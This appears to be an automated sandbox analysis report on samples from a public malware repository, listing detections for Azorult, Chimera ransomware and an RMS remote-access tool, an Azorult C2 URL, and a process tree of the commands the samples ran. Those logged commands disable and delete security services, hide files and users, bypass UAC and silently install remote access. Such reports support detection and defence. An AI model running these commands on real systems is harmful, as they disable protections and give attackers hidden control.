Resubmissions

25-09-2024 13:13

240925-qf647szgqc 3

25-09-2024 13:08

240925-qc8hvsxamn 9

25-09-2024 11:49

240925-nzgbsaxbjb 10

24-09-2024 15:55

240924-tdaj1avgjg 10

Analysis

  • max time kernel
    221s
  • max time network
    259s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    24-09-2024 15:55

General

Malware Config

Extracted

Family

azorult

C2

http://boglogov.site/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Chimera 64 IoCs

    Ransomware which infects local and network files, often distributed via Dropbox links.

  • Chimera Ransomware Loader DLL 1 IoCs

    Drops/unpacks executable file which resembles Chimera's Loader.dll.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • UAC bypass 3 TTPs 5 IoCs
  • Windows security bypass 2 TTPs 1 IoCs
  • Renames multiple (3297) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocks application from running via registry modification 13 IoCs

    Adds application to list of disallowed applications.

  • Downloads MZ/PE file
  • Manipulates Digital Signatures 1 TTPs 12 IoCs

    Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.

  • Modifies Windows Firewall 2 TTPs 21 IoCs
  • Stops running service(s) 4 TTPs
  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • ASPack v2.12-2.42 2 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Executes dropped EXE 17 IoCs
  • Impair Defenses: Safe Mode Boot 1 TTPs 6 IoCs
  • Modifies file permissions 1 TTPs 62 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 26 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 41 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 3 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 24 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 1 IoCs

    When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 63 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 64 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies Internet Explorer start page 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 2 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 25 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com/Da2dalus/The-MALWARE-Repo
    1⤵
    • Drops file in Windows directory
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:5276
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa5ca2cc40,0x7ffa5ca2cc4c,0x7ffa5ca2cc58
      2⤵
        PID:5560
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1796,i,9291570079368310949,690865699628667977,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1804 /prefetch:2
        2⤵
          PID:4108
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2040,i,9291570079368310949,690865699628667977,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2096 /prefetch:3
          2⤵
            PID:960
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2172,i,9291570079368310949,690865699628667977,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2144 /prefetch:8
            2⤵
              PID:2908
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,9291570079368310949,690865699628667977,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3100 /prefetch:1
              2⤵
                PID:5036
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3104,i,9291570079368310949,690865699628667977,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3152 /prefetch:1
                2⤵
                  PID:2840
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4504,i,9291570079368310949,690865699628667977,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4536 /prefetch:8
                  2⤵
                    PID:4680
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=4916,i,9291570079368310949,690865699628667977,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4752 /prefetch:8
                    2⤵
                      PID:3932
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4748,i,9291570079368310949,690865699628667977,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4560 /prefetch:8
                      2⤵
                      • Subvert Trust Controls: Mark-of-the-Web Bypass
                      • NTFS ADS
                      PID:3524
                    • C:\Users\Admin\Downloads\butterflyondesktop.exe
                      "C:\Users\Admin\Downloads\butterflyondesktop.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:480
                      • C:\Users\Admin\AppData\Local\Temp\is-S0F8M.tmp\butterflyondesktop.tmp
                        "C:\Users\Admin\AppData\Local\Temp\is-S0F8M.tmp\butterflyondesktop.tmp" /SL5="$1002D6,2719719,54272,C:\Users\Admin\Downloads\butterflyondesktop.exe"
                        3⤵
                        • Executes dropped EXE
                        • Adds Run key to start application
                        PID:5064
                        • C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe
                          "C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"
                          4⤵
                          • Chimera
                          • Executes dropped EXE
                          • Drops desktop.ini file(s)
                          • Drops file in Program Files directory
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of SendNotifyMessage
                          PID:5924
                          • C:\Program Files\Internet Explorer\iexplore.exe
                            "C:\Program Files\Internet Explorer\iexplore.exe" -k "C:\Users\Admin\Downloads\YOUR_FILES_ARE_ENCRYPTED.HTML"
                            5⤵
                              PID:5460
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html
                            4⤵
                            • Enumerates system info in registry
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                            • Suspicious use of SendNotifyMessage
                            PID:5772
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffa5bf03cb8,0x7ffa5bf03cc8,0x7ffa5bf03cd8
                              5⤵
                                PID:496
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,10081012852889296467,10564147176239520154,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:2
                                5⤵
                                  PID:4224
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,10081012852889296467,10564147176239520154,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
                                  5⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4340
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,10081012852889296467,10564147176239520154,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:8
                                  5⤵
                                    PID:5424
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,10081012852889296467,10564147176239520154,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:1
                                    5⤵
                                      PID:3124
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,10081012852889296467,10564147176239520154,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
                                      5⤵
                                        PID:2468
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,10081012852889296467,10564147176239520154,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:1
                                        5⤵
                                          PID:3960
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,10081012852889296467,10564147176239520154,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4804 /prefetch:8
                                          5⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:3624
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,10081012852889296467,10564147176239520154,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:1
                                          5⤵
                                            PID:5784
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,10081012852889296467,10564147176239520154,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
                                            5⤵
                                              PID:4320
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,10081012852889296467,10564147176239520154,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5624 /prefetch:1
                                              5⤵
                                                PID:1824
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,10081012852889296467,10564147176239520154,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
                                                5⤵
                                                  PID:5144
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1892,10081012852889296467,10564147176239520154,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6100 /prefetch:8
                                                  5⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:880
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5212,i,9291570079368310949,690865699628667977,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4936 /prefetch:8
                                            2⤵
                                            • NTFS ADS
                                            PID:5796
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=984,i,9291570079368310949,690865699628667977,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4884 /prefetch:8
                                            2⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:6032
                                        • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                          "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                          1⤵
                                            PID:732
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                            1⤵
                                              PID:1300
                                            • C:\Windows\System32\CompPkgSrv.exe
                                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                                              1⤵
                                                PID:3756
                                              • C:\Windows\System32\CompPkgSrv.exe
                                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                1⤵
                                                  PID:572
                                                • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
                                                  "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
                                                  1⤵
                                                  • Suspicious use of SetWindowsHookEx
                                                  PID:4808
                                                • C:\Windows\System32\rundll32.exe
                                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                  1⤵
                                                    PID:4388
                                                  • C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Spyware\HawkEye.exe
                                                    "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Spyware\HawkEye.exe"
                                                    1⤵
                                                      PID:2600
                                                    • C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Stealer\Azorult.exe
                                                      "C:\Users\Admin\Desktop\The-MALWARE-Repo-master\Stealer\Azorult.exe"
                                                      1⤵
                                                      • Modifies Windows Defender Real-time Protection settings
                                                      • UAC bypass
                                                      • Blocks application from running via registry modification
                                                      • Hide Artifacts: Hidden Users
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      • Suspicious use of SetWindowsHookEx
                                                      PID:6044
                                                      • C:\ProgramData\Microsoft\Intel\wini.exe
                                                        C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
                                                        2⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of SetWindowsHookEx
                                                        PID:5964
                                                        • C:\Windows\SysWOW64\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
                                                          3⤵
                                                            PID:3504
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3040
                                                              • C:\Windows\SysWOW64\regedit.exe
                                                                regedit /s "reg1.reg"
                                                                5⤵
                                                                • UAC bypass
                                                                • Windows security bypass
                                                                • Hide Artifacts: Hidden Users
                                                                • Runs .reg file with regedit
                                                                PID:4660
                                                              • C:\Windows\SysWOW64\regedit.exe
                                                                regedit /s "reg2.reg"
                                                                5⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • Runs .reg file with regedit
                                                                PID:5352
                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                timeout 2
                                                                5⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • Delays execution with timeout.exe
                                                                PID:200
                                                              • C:\ProgramData\Windows\rutserv.exe
                                                                rutserv.exe /silentinstall
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:3480
                                                              • C:\ProgramData\Windows\rutserv.exe
                                                                rutserv.exe /firewall
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:2264
                                                              • C:\ProgramData\Windows\rutserv.exe
                                                                rutserv.exe /start
                                                                5⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:2712
                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                ATTRIB +H +S C:\Programdata\Windows\*.*
                                                                5⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • Views/modifies file attributes
                                                                PID:2020
                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                ATTRIB +H +S C:\Programdata\Windows
                                                                5⤵
                                                                • System Location Discovery: System Language Discovery
                                                                • Views/modifies file attributes
                                                                PID:5928
                                                              • C:\Windows\SysWOW64\sc.exe
                                                                sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
                                                                5⤵
                                                                • Launches sc.exe
                                                                PID:5972
                                                              • C:\Windows\SysWOW64\sc.exe
                                                                sc config RManService obj= LocalSystem type= interact type= own
                                                                5⤵
                                                                • Launches sc.exe
                                                                • System Location Discovery: System Language Discovery
                                                                PID:836
                                                              • C:\Windows\SysWOW64\sc.exe
                                                                sc config RManService DisplayName= "Microsoft Framework"
                                                                5⤵
                                                                • Launches sc.exe
                                                                PID:2700
                                                          • C:\ProgramData\Windows\winit.exe
                                                            "C:\ProgramData\Windows\winit.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Checks processor information in registry
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:2836
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
                                                              4⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2344
                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                timeout 5
                                                                5⤵
                                                                • Delays execution with timeout.exe
                                                                PID:1152
                                                        • C:\programdata\install\cheat.exe
                                                          C:\programdata\install\cheat.exe -pnaxui
                                                          2⤵
                                                          • Executes dropped EXE
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:3636
                                                          • C:\ProgramData\Microsoft\Intel\taskhost.exe
                                                            "C:\ProgramData\Microsoft\Intel\taskhost.exe"
                                                            3⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:1336
                                                            • C:\programdata\microsoft\intel\P.exe
                                                              C:\programdata\microsoft\intel\P.exe
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:1324
                                                            • C:\programdata\microsoft\intel\R8.exe
                                                              C:\programdata\microsoft\intel\R8.exe
                                                              4⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:3080
                                                            • C:\ProgramData\Microsoft\Intel\winlog.exe
                                                              C:\ProgramData\Microsoft\Intel\winlog.exe -p123
                                                              4⤵
                                                                PID:5596
                                                              • C:\Programdata\RealtekHD\taskhostw.exe
                                                                C:\Programdata\RealtekHD\taskhostw.exe
                                                                4⤵
                                                                  PID:4080
                                                            • C:\programdata\install\ink.exe
                                                              C:\programdata\install\ink.exe
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:4328
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c sc start appidsvc
                                                              2⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3520
                                                              • C:\Windows\SysWOW64\sc.exe
                                                                sc start appidsvc
                                                                3⤵
                                                                • Launches sc.exe
                                                                PID:4260
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c sc start appmgmt
                                                              2⤵
                                                                PID:2292
                                                                • C:\Windows\SysWOW64\sc.exe
                                                                  sc start appmgmt
                                                                  3⤵
                                                                  • Launches sc.exe
                                                                  PID:3360
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
                                                                2⤵
                                                                  PID:4340
                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                    sc config appidsvc start= auto
                                                                    3⤵
                                                                    • Launches sc.exe
                                                                    PID:5568
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
                                                                  2⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3424
                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                    sc config appmgmt start= auto
                                                                    3⤵
                                                                    • Launches sc.exe
                                                                    PID:5564
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c sc delete swprv
                                                                  2⤵
                                                                    PID:4972
                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                      sc delete swprv
                                                                      3⤵
                                                                      • Launches sc.exe
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:3844
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c sc stop mbamservice
                                                                    2⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5468
                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                      sc stop mbamservice
                                                                      3⤵
                                                                      • Launches sc.exe
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:5888
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
                                                                    2⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:2064
                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                      sc stop bytefenceservice
                                                                      3⤵
                                                                      • Launches sc.exe
                                                                      PID:5252
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
                                                                    2⤵
                                                                      PID:5160
                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                        sc delete bytefenceservice
                                                                        3⤵
                                                                        • Launches sc.exe
                                                                        PID:1128
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c sc delete mbamservice
                                                                      2⤵
                                                                        PID:5928
                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                          sc delete mbamservice
                                                                          3⤵
                                                                          • Launches sc.exe
                                                                          PID:4784
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c sc delete crmsvc
                                                                        2⤵
                                                                          PID:2712
                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                            sc delete crmsvc
                                                                            3⤵
                                                                            • Launches sc.exe
                                                                            PID:856
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c sc delete "windows node"
